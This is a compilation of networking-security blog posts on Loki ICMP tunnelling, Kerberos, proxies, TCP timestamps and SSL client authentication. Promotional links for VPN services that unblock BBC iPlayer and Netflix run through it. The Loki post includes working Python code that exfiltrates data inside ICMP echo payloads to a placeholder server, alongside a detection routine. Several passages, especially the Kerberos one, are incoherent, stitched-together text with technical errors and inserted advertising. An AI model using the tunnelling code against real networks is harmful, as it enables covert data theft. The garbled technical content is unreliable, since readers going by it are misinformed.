Loki – How ICMP Really Can be Dangerous

Overall, ICMP has been viewed as quite a harmless, perhaps even trivial protocol. However, that all changed with the rather nasty Loki.  In case you didn’t know, Loki in Norse mythology was the god of trickery and mischief.  The Loki exploit is well named, as it subverts the hitherto benign ICMP protocol.  ICMP is intended mainly to report error conditions and to make very simple requests, which is one of the reasons intrusion analysts and malware students tended to ignore it.  Of course it could be used in rather obvious denial of service attacks, but those were easily tracked and blocked.

However, Loki changed that situation by using ICMP as a tunnelling protocol to create a covert channel. A covert channel in these circumstances means a transport method used in a secret or unexpected way. The transport vehicle is ICMP, but Loki behaves much more like a client/server application.  Any compromised host that gets a Loki server instance installed can respond to traffic and requests from a Loki client.  So, for instance, a Loki server could respond to a request to dump the password file to screen or to disk, which could then be captured and cracked by the owner of the Loki client application.
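
To make the technique concrete, here is a minimal sketch of ICMP tunnelling in Python using scapy. It illustrates the general covert channel idea rather than Loki’s actual implementation; the server address, chunk size and interface name are all hypothetical.

from scapy.all import IP, ICMP, Raw, send, sniff

SERVER = "203.0.113.10"   # hypothetical compromised host running a Loki-style server

def send_covert(data: bytes, chunk_size: int = 32) -> None:
    """Smuggle data out in the payloads of ICMP echo requests."""
    for i in range(0, len(data), chunk_size):
        chunk = data[i:i + chunk_size]
        # To a firewall each packet looks like an ordinary ping.
        send(IP(dst=SERVER) / ICMP(type=8) / Raw(load=chunk), verbose=False)

def watch_for_covert(iface: str = "eth0") -> None:
    """The analyst's side: flag echo traffic carrying unusual payloads."""
    def inspect(pkt):
        if pkt.haslayer(ICMP) and pkt.haslayer(Raw):
            print(pkt[IP].src, "->", pkt[IP].dst, pkt[Raw].load[:32])
    sniff(iface=iface, filter="icmp", prn=inspect, store=False)

The point for defenders is in the second function: ordinary pings carry a fixed, predictable payload, so echo traffic with varying payloads deserves a much closer look.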

Many intrusion detection analysts would have simply ignored ICMP traffic passing through their logs, mainly because it’s such a common protocol but also such an innocuous one.  Of course, well-read analysts now know to treat such traffic with heightened suspicion; Loki really has changed the game for protocols like ICMP.

For those of us who spend many hours watching traffic, Loki was a real eye opener.  You had to check those logs a little more carefully, especially to watch out for familiar protocols being used in a different context.  There’s some more information on these attacks hidden on this technology blog – http://www.iplayerabroad.com/using-a-proxy-to-watch-the-bbc/.  It can take some finding though!


Introduction to Kerberos Authentication

Kerberos is one of the most widely used methods of authentication, and this post will briefly introduce you to the subject. As well as being implemented in many operating systems, Kerberos is available in many commercial products too. It is a mature protocol that has been tested and scrutinised for decades, and it brings some crucial benefits, although it also has a few flaws that system administrators need to take into consideration. Kerberos is the most frequently used example of this sort of ticket-based authentication technology.

Once a client has authenticated, a session encryption key is created. Transport layer encryption isn’t strictly necessary if SPNEGO is used, but the client’s browser has to be properly configured. Authentication is automatic if the domains are in the same forest. This sort of authentication is fairly simple to understand, since it only involves two systems, yet there are plenty of things that can go wrong with Kerberos authentication. If Kerberos authentication fails using the LocalSystem account, it will more than likely also fail when users go to the remote system. And it’s not only used for authenticating users: when your iPad connects through its VPN to watch British channels online using your AD network, it’s Kerberos that authenticates the machine.

If the password is incorrect, you won’t be able to decrypt the message. It is extremely important that you don’t forget this password. You might be surprised how many users choose a password that is exactly the same as their user name.

Your user name is not a good choice for a password. When using those services or clients, you may have to enter your password, which is then sent to the server. It’s very probable that a user will set the same password for two principals for reasons of convenience. Ideally, you should only have to type your password into your own computer once, at the start of the day.

You won’t be able to administer your server if you forget the master password. If the server cannot automatically register the SPN, the SPN has to be registered manually. It’s normal for the admin server to take a little time to start, so be patient. Along the way you may see errors such as ‘The specified server cannot perform the requested operation’ or ‘The RPC server is not actively listening’. A virtual server simply means one that is not part of a dedicated host.

Another common error is ‘Server refused to negotiate authentication, which is required for encryption’. Before deploying Kerberos, a server has to be selected to act as the KDC. The network location server is a site used to detect whether DirectAccess clients are located inside the corporate network.

The client may be using an old Kerberos V5 implementation that doesn’t support the initial connection. If the client is unable to get a ticket, you should see an error similar to the one below. In the Kerberos protocol the authentication is mutual: the client authenticates against the server, and the server also authenticates itself against the client. At the transport level, the RPC client sends the very first packet, called the SYN packet.

If each client required a unique key for each and every service, and each service required a unique key for each client, key distribution would quickly become a challenging problem to solve. A client will not send its job unless it receives the correct response. The client can’t decrypt the service ticket, because only the server can do so, but it can nevertheless pass it on. Later the client can use this ticket to obtain additional tickets for the service server (SS) using the same shared secret. Both client and server may also be called security principals.
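
A conceptual sketch may make the ticket mechanics clearer. The snippet below uses ordinary symmetric encryption (Fernet from the Python cryptography package) purely to illustrate why the client can carry a ticket it cannot read; it is not the real Kerberos message format, and the key and principal names are invented.

from cryptography.fernet import Fernet, InvalidToken

# Long-term shared secrets: the KDC knows every principal's key.
service_key = Fernet.generate_key()   # shared by the KDC and the service server (SS)
session_key = Fernet.generate_key()   # fresh key for this client/service pair

# The KDC seals the ticket with the *service's* key ...
ticket = Fernet(service_key).encrypt(
    b"client=alice; service=SS; session_key=" + session_key
)

# ... so the client cannot read it, only forward it.
try:
    Fernet(session_key).decrypt(ticket)
except InvalidToken:
    print("client cannot decrypt the ticket, only pass it on")

# The service, holding its own long-term key, can decrypt and trust it.
print(Fernet(service_key).decrypt(ticket))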

John Simmons
http://bbciplayerabroad.co.uk/uk-vpn-free-trial/

Filtering Authentication Credentials

When you use a proxy or VPN server there is a very important, sometimes overlooked, security consideration you should be aware of: how the connection handles any authentication credentials that are sent across it.  For example, if you are using a proxy for all your web browsing, you need to trust that server with any user names and passwords that you supply to websites.  Remember, the proxy will forward all traffic to the origin server, including those user credentials.

The other consideration is the proxy server’s own authentication credentials, which may also be transmitted or passed on, especially if the servers are chained.  It is common for proxy credentials to be forwarded, as it reduces the need to authenticate multiple times against different servers.  In these situations the last proxy server in the chain should filter out the Proxy-Authorization: header if it is present.
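
As a minimal sketch (assuming a simple dictionary of request headers), the filtering step at the final proxy might look something like this; the header values and the helper function are hypothetical examples.

# Proxy-Authorization is hop-by-hop credential material and should not be
# forwarded to the origin; Authorization is end-to-end and must be kept.
HOP_BY_HOP = {"proxy-authorization", "proxy-connection", "connection"}

def filter_outbound_headers(headers: dict) -> dict:
    """Drop proxy credentials before forwarding a request to the origin."""
    return {k: v for k, v in headers.items() if k.lower() not in HOP_BY_HOP}

request_headers = {
    "Host": "example.com",
    "Authorization": "Basic dXNlcjpzZWNyZXQ=",        # for the origin: keep
    "Proxy-Authorization": "Basic cHJveHk6Y3JlZHM=",  # for the proxy: strip
}
print(filter_outbound_headers(request_headers))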

One of the dangers is that a malicious server could intercept or capture these authentication credentials, especially if they’re being passed in an insecure manner.  Any proxy involved in the route has the potential to intercept usernames and passwords.  Many people forget this when using random free proxies they find online; they are implicitly trusting these servers, and their unknown administrators, with any personal details leaked while using these connections.  When you consider that these free servers are often merely misconfigured or ‘hacked’ servers, using them becomes even more risky.

How to deal with authentication details is actually a difficult question, particularly with regard to proxies.  The situation with VPNs is slightly more straightforward: the details are protected during the majority of the transmission because most VPNs are encrypted.  However, the last step to the target server will rely on whatever security is built into the connection, although this can be affected as in this article – BBC block VPN connection.

Any server can filter out and protect authentication credentials, but obviously those intended for the target can’t be removed.  It is a real risk and does highlight one of the important security considerations of using any intermediate server such as a proxy.  It is important that these servers are themselves secure and do not introduce additional security risks into the connection.  Sending credentials over a normal HTTP session is already potentially insecure, even without a badly configured or administered proxy server in the path as well.

Most websites which accept usernames now at least use something like SSL to protect credentials.  However, although VPN sessions will transport these connections effectively, many proxies are unable to support the tunnelling of SSL connections properly.  Man-in-the-middle attacks are also common against these sorts of protections, and using a poorly configured proxy makes them much easier than a direct connection does.  Ultimately there are several points where web security and protecting the data is a concern; it’s best to ensure that a VPN or proxy doesn’t introduce additional security risks into the connection.

Additional Reading on UK VPN Trial


Content Filtering and Proxies

Proxy servers are, as explained on this site, one of the most important components of a modern network infrastructure.  No corporate network should allow ordinary desktop PCs or laptops to access the internet directly without some sort of protection.  Proxy servers provide that protection to a certain extent, as long as their use is enforced.

Most users, especially technically minded ones, will often resent using proxies because they are aware of the control this entails.  The simplest way to enforce their use is to ensure that configuration files are delivered automatically to the desktop by network servers.  In a Windows environment this can be achieved using Active Directory, which can ensure desktops and users receive specific internet configuration files.  For example, you can configure Internet Explorer with a specific configuration which is delivered to every desktop on login.  In addition, you can also use Active Directory to block users from installing and configuring other browsers.

However, although this allows you to control which browser and which internet route each user will take, it doesn’t restrict what that user can do online.  Another layer is required, and most companies will employ some sort of content filtering in order to protect their environment.  As far as your proxy server is concerned, content filtering will almost certainly have a major impact on performance.

One of the most common forms is URL filtering, and this has one of the biggest performance impacts.  This is largely because this sort of filtering inevitably has many patterns to match against, and because of the sheer volume of data involved.  Even running a nominal content filter against a UK VPN trial had a similar effect.
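
A toy example shows where the cost comes from: every single outbound URL has to be tested against the whole rule set. The patterns below are invented examples.

import re

BLOCK_PATTERNS = [re.compile(p) for p in (
    r"\.example-gambling\.",     # invented category rule
    r"/downloads/.*\.exe$",      # invented file-type rule
    r"^http://",                 # e.g. a rule against plain HTTP
)]

def is_blocked(url: str) -> bool:
    # Cost grows with rules x requests: every URL runs the whole gauntlet.
    return any(p.search(url) for p in BLOCK_PATTERNS)

for url in ("https://intranet.local/report",
            "http://www.example-gambling.com/"):
    print(url, "->", "BLOCKED" if is_blocked(url) else "allowed")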

There are a variety of different types of filtering, such as HTML tag filtering, virus screening and URL screening.  It can be difficult though, and the technology is developing all the time, for instance the ability to screen things like Java or ActiveX objects.

One of the biggest problems with content filtering, in terms of maintaining performance on the proxies, is the fact that entire objects need to be processed.  A proxy server has to buffer the entire file, and can only proceed with the transmission after the whole file has been checked.  From the user’s perspective this can be frustrating, as there will be long pauses and delays in their browsing, especially on busy networks.  This delay can obviously be justified in the case of screening for viruses, however it can be controversial for other screening purposes.
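
A small sketch of that buffering behaviour, with a stand-in scanning function, shows why the user sees nothing until the whole object has been checked.

def scan_content(data: bytes) -> bool:
    """Stand-in for a real virus/content scanning engine."""
    return b"EICAR" not in data

def relay_with_scanning(chunks) -> bytes:
    body = b""
    for chunk in chunks:              # buffer the ENTIRE object first;
        body += chunk                 # the user sees nothing during this pause
    if scan_content(body):            # only now can transmission begin
        return body
    return b"HTTP/1.1 403 Forbidden\r\n\r\n"

# Simulated origin response arriving in pieces:
print(relay_with_scanning([b"<html>", b"harmless page", b"</html>"]))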

Further Reference: Using a Paid VPN Service

TCP Configuration: Timestamp Option

The function of the timestamp option is fairly self explanatory: it simply lets the sender place a timestamp value in each and every segment.  In turn, the receiver reflects this value in its acknowledgement, which allows the sender to calculate a round trip time for every received ACK.  Remember this is per ACK and not per segment, as a single ACK can cover multiple segments.

Initially most implementations of TCP would only take one RTT measurement per window; however this has changed, and nowadays larger window sizes need more accurate RTT calculations.  You can read about the definitions of these calculations in RFC 1323, which covers the enhanced TCP extensions that allow these improved RTT calculations.  Timing one segment per window amounts to sampling the round trip time at a low frequency, which works well enough with smaller windows (and fewer segments).

Accurate measurement of data transmission is often very difficult in congested and busy networks, and also when troubleshooting across networks like the internet.  It’s difficult to isolate issues and solve problems in these sorts of environments because you have no control over, or access to, the majority of the transport hardware.  For example, if you are trying to fix a Netflix VPN problem remotely, being able to check the RTT is essential to analyse where the problems potentially lie.

The sender places a 32 bit value in the initial field, which is echoed back by the receiver in the reply field. This increases the size of the TCP header from 20 bytes to 32 bytes when the option is used. The timestamp value simply increases over time; there is no clock synchronization between the sender and the receiver, merely a monotonically increasing timestamp. Most implementations of the timestamp option recommend that the value increment in units of one, with a tick ideally between 1 millisecond and 1 second.
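
For illustration, here is a short sketch that parses the timestamp option (kind 8, length 10, per RFC 1323) out of a TCP options block; the sample bytes include the two NOP pads that take the header from 20 to 32 bytes.

import struct

def parse_tcp_options(options: bytes):
    """Return (TSval, TSecr) if a timestamp option is present."""
    i = 0
    while i < len(options):
        kind = options[i]
        if kind == 0:                 # end of option list
            break
        if kind == 1:                 # NOP, used as padding
            i += 1
            continue
        length = options[i + 1]
        if kind == 8:                 # timestamp option: kind 8, length 10
            return struct.unpack("!II", options[i + 2:i + 10])
        i += length
    return None

# Two NOP pads, then kind=8 len=10 with TSval=1000 and TSecr=950 --
# 12 bytes of options in total, on top of the basic 20-byte header.
opts = bytes([1, 1, 8, 10]) + struct.pack("!II", 1000, 950)
print(parse_tcp_options(opts))        # -> (1000, 950)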

This option is configured during connection establishment and is handled the same way as the window scale option in the previous section. As you may know, the receiving connection does not have to acknowledge every data segment it receives. The bookkeeping is simplified because only a single timestamp value is maintained per active connection, which is updated according to a simple algorithm.

First of all, TCP keeps track of the timestamp value to send in the next ACK (in a variable called tsrecent) and the acknowledgement sequence number from the last ACK that was sent (in a variable called lastack). When a segment arrives that contains the byte numbered lastack, the timestamp value from that segment is saved in tsrecent. Whenever a timestamp option is sent, tsrecent is sent as the echo reply, and the sequence number field of that ACK is stored in lastack.
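
A small sketch of that bookkeeping may help; the variable names mirror tsrecent and lastack above, while the framing around them is invented for the example.

class TimestampState:
    def __init__(self):
        self.tsrecent = 0   # timestamp value to echo in the next ACK sent
        self.lastack = 0    # ack sequence number from the last ACK sent

    def on_segment_arrival(self, seg_seq: int, seg_ts: int) -> None:
        # Save the timestamp only from the segment that contains the
        # byte we last acknowledged, i.e. the one at the left edge.
        if seg_seq == self.lastack:
            self.tsrecent = seg_ts

    def build_ack(self, ack_seq: int) -> dict:
        self.lastack = ack_seq
        return {"ack": ack_seq, "ts_echo_reply": self.tsrecent}

state = TimestampState()
state.on_segment_arrival(seg_seq=0, seg_ts=100)     # first segment
state.on_segment_arrival(seg_seq=1000, seg_ts=105)  # arrives before any ACK
print(state.build_ack(ack_seq=2000))   # a delayed ACK still echoes 100

Echoing the older timestamp means a delayed ACK times the full delay experienced by the first, not the last, segment it covers.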

This means that in addition to allowing better RTT calculation, the timestamp option also performs another function: the receiver can use it to reject old duplicate segments, via an additional feature called PAWS – Protection Against Wrapped Sequence numbers.

Further Reading on Commercial Proxy Options – http://www.anonymous-proxies.org/2017/05/buy-uk-proxy-ip-address.html

Security Specifications and Initiatives

Throughout the internet community there are many groups working to resolve a variety of security related issues online.  Their activities cover all aspects of internet security, and networking in general, from authentication, firewalls and one time passwords to public key infrastructure, transport layer security and much more.

Many of the most important security protocols, initiatives and specifications being developed can be researched at the following groups.

TCSEC (Trusted Computer System Evaluation Criteria)

These are requirements for secure products as defined by the US National Security Agency.  They are important standards which many US and global companies use in establishing baselines for their computer and network infrastructure.  You will often hear these standards referred to as the ‘Orange Book’.

CAPI (Crypto API)

CAPI is an application programming interface developed by Microsoft which makes it much easier for developers to create applications which incorporate both encryption and digital signatures.

CDSA (Common Data Security Architecture) 

CDSA is a security reference standard primarily designed to help develop applications which take advantage of other software security mechanisms.  Although not initially widely used, CDSA has since been accepted by the Open Group for evaluation, and technology companies such as IBM, Netscape and Intel have helped develop the standard further.  It is important for a disparate communication medium such as the internet to have open and interoperable standards for applications and software.  The standard also includes an expansion platform for future developments and improvements in security elements and architecture.

GSS-API – (Generic Security Services API)

The GSS-API is a higher level interface that gives applications and software a uniform way into underlying security technologies.  For example, it can act as a gateway into private and public key infrastructure and technologies.

This list is, of course, a long way from being complete, and because of the fast paced development of security technologies it’s very likely to change greatly.  It should be remembered that although there is an obvious requirement for security at the server level, securing applications and software on the client is also important.  Client side security is often more of a challenge due to different platforms and a lack of standards – configuration settings on every computer are likely to be different.

Many people now take security and privacy extremely seriously, especially now that so much of our lives involves online activity.  Using encryption and some sort of IP cloaker like this to provide anonymity is extremely common.  Most of these security services are provided by third parties through specialised software.  Again, incorporating these into some sort of common security standard is a sensible option, yet somewhat difficult to achieve.

Further Reading: Netflix VPN Problem, Haber Press, 2015

Certificate Based Client Authentication

One of the most important features of SSL is its ability to authenticate clients based on SSL certificates.  People often fail to understand that this certificate based authentication can only be used while SSL is in operation; it is not available in other situations.  Take the more common example on the web of insecure HTTP exchanges: here SSL certificate based authentication is not available, and the only option is to control access using basic username and password authentication.  This represents possibly the biggest security issue on the internet today, because it also takes place in clear text!

Another common misconception concerns the SSL sessions themselves.  SSL sessions are established between two endpoints.  The session may go through an SSL tunnel, which is effectively a forward proxy server.  However, secure reverse proxying is not SSL tunnelling; it’s probably better described as HTTPS proxying, although this is not a commonly used term.  In this arrangement the proxy acts as the endpoint of one SSL session, terminating the client’s session and opening a second session to forward the request to the origin server.

The two sessions are distinct, except of course that both will be present in the cache and memory of the proxy server. An important consequence of this is that the client’s certificate based authentication credentials are not relayed to the origin server.  The SSL session between the client and the reverse proxy authenticates the client to the proxy server, while in the SSL session between the proxy and the origin server it is the origin server that authenticates itself.  Any certificate presented to the origin server is the reverse proxy’s certificate, so the origin server has no knowledge of the client and its certificate.
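
A sketch using Python’s standard ssl module shows the two distinct sessions; the certificate file names and origin host are hypothetical, and a real reverse proxy would obviously do far more than this.

import socket, ssl

# Client-facing side: this is where the client certificate is verified.
front = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
front.load_cert_chain("proxy-cert.pem", "proxy-key.pem")      # hypothetical files
front.load_verify_locations("trusted-client-ca.pem")
front.verify_mode = ssl.CERT_REQUIRED     # demand a client certificate here

# Origin-facing side: a completely separate session, in which the origin
# only ever sees the proxy's identity, never the client's certificate.
back = ssl.create_default_context()
back.load_cert_chain("proxy-cert.pem", "proxy-key.pem")

def forward(request: bytes, origin_host: str) -> bytes:
    with socket.create_connection((origin_host, 443)) as raw:
        with back.wrap_socket(raw, server_hostname=origin_host) as tls:
            tls.sendall(request)
            return tls.recv(65536)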

To summarise: what is lost is the ability to authenticate the client to the origin server through the reverse proxy server.

In situations where certificate based client authentication and access control are required, that role has to be performed by the reverse proxy itself.  In other words, the access control function is delegated to the proxy server.  Currently there is no protocol available for transferring access control data from the origin server to the reverse proxy server.  However, there are situations in advanced networks where the access control lists can be stored in an LDAP server, for example in Windows Active Directory domains.  This enables all unverified connections to be controlled, e.g. blocking BBC VPN connections, including outbound client requests to the media servers.

The reverse proxy in this situation could be described as operating as a web server.  Indeed, the authentication required by the reverse proxy is actually web server authentication, not proxy server authentication.  Crucially, the challenge status code is therefore HTTP 401 and not 407.  This is an important difference and a simple way to identify exactly which authentication methods are taking place on a network when you’re troubleshooting.
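
When troubleshooting, the difference is easy to check; a minimal probe (against a hypothetical host and path) only needs to look at the status code and the matching challenge header.

import http.client

conn = http.client.HTTPConnection("www.example.com", 80, timeout=10)
conn.request("GET", "/protected/")
resp = conn.getresponse()

if resp.status == 401:
    # Challenge from the web server (or a reverse proxy acting as one).
    print("web server auth:", resp.getheader("WWW-Authenticate"))
elif resp.status == 407:
    # Challenge from a forward proxy somewhere in the path.
    print("proxy auth:", resp.getheader("Proxy-Authenticate"))
else:
    print("no auth challenge, status", resp.status)
conn.close()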


Video Proxy – How to Unlock the World’s Best Media Sites

When you read about the internet, it’s usually about how it’s constantly expanding and growing, but that’s not strictly true.  Although new information is being added all the time, the reality is that much of it is often inaccessible, particularly when you’re looking at video websites.

Take, for instance, one of the world’s most popular websites, BBC iPlayer. It contains thousands of programmes, videos and radio broadcasts, and is updated every single day.  It’s a wonderful resource which is continually refreshed, yet unfortunately the site is not accessible when you are located outside the United Kingdom, unless you use something like a video proxy to help you. So why is it so difficult to access these sites? Why do people who happen to be away from home, perhaps in Roubaix in France or a seaside town in Spain, constantly search for ways to unblock video pages on YouTube and the big media sites?

It’s an incredible situation, yet one that is becoming increasingly common: the internet is becoming compartmentalised, split into geographical sectors controlled by the internet’s big players.  The method used is something called geo-blocking, or geo-locking, and the majority of large web sites use it to some extent. You’ll find that a particular site will remove content based on your location; in fact, in some countries it’s almost impossible to watch videos on any of the major platforms.  The method has been criticised by all sorts of civil liberty organisations. Indeed the EU itself has made criticisms, which you can find here, because the practice also undermines its concept of a Single Market.

The technology implemented varies slightly from site to site, yet it’s basically the same: record the IP address and look up its location in a central database of addresses. So when you visit the BBC web site to watch a David Attenborough documentary, if your IP address isn’t registered in the UK then you’ll get blocked.

Video proxy

Planet Earth Documentaries on BBC iPlayer

It’s extremely frustrating, especially for someone from the UK, and so workarounds were created.  I mentioned above the concept of a video proxy to bypass these blocks, and it does work to some extent.  You bounce your connection off an intermediate proxy server based in the location you need, which effectively hides your true IP address and location and will unblock video sites easily.

However, it’s important to remember that from 2016 onwards simple proxies no longer work on any of the major media sites.  Forget the thousands of simple unblock sites that promise to bypass internet restrictions; they simply don’t work any more. Without even basic SSL encrypted connections they can be detected easily, and all the major sites block them automatically. Some are still able to unblock YouTube videos, but even those are fairly rare now. Many have been blocked at the server level, and their hosting services have told them to remove scripts like Glype. Unfortunately the days of the free proxy sites and web proxies have now gone for good, at least for accessing video sites and the large multimedia companies who provide the top rated video production.

However, the concept still works just like the old video proxy method; you’ll just need a securely configured VPN server which cannot be detected.  The encryption is useful, giving you the insurance of anonymity while still allowing cookies to flow down the connection transparently.  It works in the same way, hiding your real address and instead presenting the address of the VPN server.  Using this method, you can watch any media site from Hulu to Netflix and the BBC, irrespective of your location.  Unfortunately most simple proxies are now blocked, so even the best free proxy sites are useless for accessing media sites like these.

Here’s one in action using a proxy to watch video content from the BBC –


It’s a highly sophisticated program that will allow you to proxy video through a secure connection, and fast enough to let you watch video without buffering. It’s very easy to use to unblock video, and you’ll find it can bypass internet filters too, which are also commonly implemented. A demo version is available to test it out; it won’t function as a YouTube proxy unfortunately, but you can at least use the free version to unblock Facebook.  The main program works on PCs and laptops, but unlike simple unblock proxy sites you can also use it as a mobile video proxy by establishing a VPN connection on your smartphone or tablet – it’s relatively simple to do.

There is one other method I should mention, which you can find discussed in this article here. It’s called Smart DNS and is a simpler alternative to using a VPN service.

It’s what literally millions of people around the world are doing right now: relaxing in the sun while watching the news on the BBC or their favourite US entertainment channel.  There are a lot of these services available now, but only a few that work properly.  Our recommendation doesn’t look like a TV watching VPN at first glance, simply because they keep that functionality low key.  Yet for over a decade it has supported all the major media channels in a variety of countries.

It’s called Identity Cloaker – You can try their 10 day trial here – Identity Cloaker

Buy US Proxy with Transparent Proxying

When discussing the technological characteristics of proxies there’s one term which you will see used very often – ‘transparent’.  It can actually be used in two distinct ways when it comes to proxies.  The first refers to the idea that a transparent proxy makes no difference to the original request: the user sees the same result whether the request goes direct to the server or through the proxy.  In an ideal world pretty much all legitimate proxies would be considered ‘transparent’ in this sense.

Proxies, however, have become significantly more advanced since the early years when this original definition was created, and the term ‘transparent proxying’ has acquired a second meaning: the client software is not aware of the existence of the proxy server in the communication stream at all.  This is unusual because traditionally the client was explicitly configured to use a proxy, perhaps through the internet settings in its browser configuration.  The software would then distinguish between proxy requests and direct requests.

With transparent proxying in its modern sense, it is the router, not the client, that redirects the request through the proxy. This means the proxy can intercept and control all HTTP requests on outbound connections.  Each request can be parsed, filtered and even redirected.  This control allows the network to enforce access control rules on all outbound requests; a company could use these to ensure unsuitable requests, e.g. to illegal web sites, are not being made from the corporate network.
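
As a rough sketch, the interception step might look like the following; the blocked host list and the redirect port are invented, and the onward forwarding is left as a stub.

import socket

BLOCKED_HOSTS = {"illegal-site.example", "banned.example"}   # invented rules

def handle_redirected_connection(client: socket.socket) -> None:
    request = client.recv(4096)
    host = ""
    for line in request.split(b"\r\n")[1:]:       # find the Host: header
        if line.lower().startswith(b"host:"):
            host = line.split(b":", 1)[1].strip().decode()
            break
    if host in BLOCKED_HOSTS:
        client.sendall(b"HTTP/1.1 403 Forbidden\r\n\r\nBlocked by policy\r\n")
    else:
        pass   # stub: connect to the real host and relay the request
    client.close()

listener = socket.socket()
listener.bind(("0.0.0.0", 3128))   # port the router redirects web traffic to
listener.listen(5)
while True:
    conn, _ = listener.accept()
    handle_redirected_connection(conn)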

This level of transparent proxying leaves the client completely unaware of the existence of an intermediate proxy server.  There are some caveats though, and the proxy can be detected in certain circumstances.  For example, there is little point in investing in a USA proxy buy if the server only supports HTTP/1.1, because the protocol makes no allowance for transparency in proxying information.

One of the main worries is that allowing completely transparent proxying might cause other issues, particularly in client side applications.  For example, one of the fundamentals of using proxies in a corporate network is to reduce traffic by caching locally.  This could cause all sorts of problems if the behaviour of the proxy cache affects communication between the destination server and the client application.

Further Reading – http://www.changeipaddress.net/us-ip-address-for-netflix/

Optimizing Proxies – Protocol Performance

The importance of the data transport protocol is of course crucial to a global information network like the world wide web.  Unfortunately the HTTP/1.0 protocol has some inherent issues which are directly related to performance which have been largely addressed in version 1.1 of the protocol.  It is expected that future developments will further improve the performance of the protocol.

One issue relates to the three way handshake that TCP requires before it can establish a connection. It is important to remember that during this handshake phase no application data is transferred at all; from the user’s perspective the delay simply appears as latency in establishing the initial connection.  The three way handshake involves a considerable overhead preceding data transfer and has a noticeable effect on performance, particularly on busy networks.
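
You can see this handshake cost directly by timing a bare TCP connect, which completes the SYN, SYN-ACK, ACK exchange before any application data is sent; the host below is a placeholder.

import socket, time

def handshake_time(host: str, port: int = 80) -> float:
    start = time.perf_counter()
    sock = socket.create_connection((host, port), timeout=5)
    elapsed = time.perf_counter() - start   # SYN, SYN-ACK, ACK now complete;
    sock.close()                            # not one byte of data sent yet
    return elapsed

print(f"handshake: {handshake_time('www.example.com') * 1000:.1f} ms")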

This problem is made worse by the HTTP/1.0 protocol, which makes extensive use of new connections: every request requires a new TCP connection to be established, complete with a new three way handshake.  This was originally intended as a measure to boost performance, because it was thought it would avoid long lived idle connections being left dormant.  The reasoning was that it was more efficient to establish new connections on demand, since the data bursts would be small and frequent.

However, the web has not developed like this; it is much more than a series of short HTML files quickly downloaded.  Instead the web is full of large documents and pages embedded with videos and images.  Add to that the multitude of applets, code and other embedded objects, and it soon adds up.  What’s more, each of these objects usually has its own URL and so requires a separate HTTP request.  Even if you invest in a high quality US proxy you’ll find some impact on speed using HTTP/1.0, simply due to the huge number of connection requests it generates.

Modifications were made to increase the perceived performance from the user’s perspective.  For one, multiple simultaneous connections were allowed, letting client software such as browsers download and render multiple components of a page at once, so the user wasn’t left waiting as individual components loaded separately.  However, although parallel connections increase performance for an individual user, they generally have a very negative impact on the network as a whole.  The underlying process is still inefficient, and allowing parallel connections does little to mitigate that.

As any network administrator knows, focussing on a single aspect of network performance is rarely a good idea and will almost never improve overall network performance.  The persistent connection feature was introduced to help solve this; it was added as a non-standard extension to HTTP/1.0 and included by default in HTTP/1.1.
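
The difference is easy to demonstrate with Python’s http.client; the host and paths below are placeholders. The first loop mimics HTTP/1.0 behaviour by opening a fresh connection (and paying for a fresh handshake) per object, while the second reuses one persistent connection.

import http.client

PATHS = ["/", "/page1", "/page2"]

# HTTP/1.0 style: a fresh connection, and a fresh handshake, per object.
for path in PATHS:
    conn = http.client.HTTPConnection("www.example.com")
    conn.request("GET", path)
    conn.getresponse().read()
    conn.close()

# Persistent style: one connection reused for every object.
conn = http.client.HTTPConnection("www.example.com")
for path in PATHS:
    conn.request("GET", path)
    conn.getresponse().read()
conn.close()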

Further Reading: Proxies Blocked by BBC Abroad